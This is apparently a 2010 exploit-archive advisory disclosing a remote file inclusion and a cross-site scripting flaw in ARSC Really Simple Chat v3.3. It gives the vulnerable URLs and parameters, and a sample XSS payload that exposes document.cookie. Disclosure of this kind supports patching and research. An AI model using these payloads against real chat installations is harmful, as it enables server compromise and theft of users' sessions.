[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ARSC Really Simple Chat v3.3 Remote File Inclusion & XSS Vulnerability
# Published : 2010-06-25
# Author : Zer0 Thunder
# Previous Title : 2daybiz B2B Portal Script (selling_buy_leads1.php) SQL Injection Vulnerability
# Next Title : Allomani Songs & Clips Script v2.7.0 - [CSRF] Add Admin Account


=> ARSC Really Simple Chat V3.3 Remote File Inclsion & Cross Site Scripting Vulnerability
=> Author	: Zer0 Thunder
=> Home		: http://colombohackers.com
=> Download	: http://sourceforge.net/projects/arsc/
=> Date 	: 06/25/2010


Remote File Inclusion
---

http://localhost/arsc3.3-pre2/base/dereferer.php?arsc_link=[RFI]


XSS Call
--------

http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=[XSS]


Example :
http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E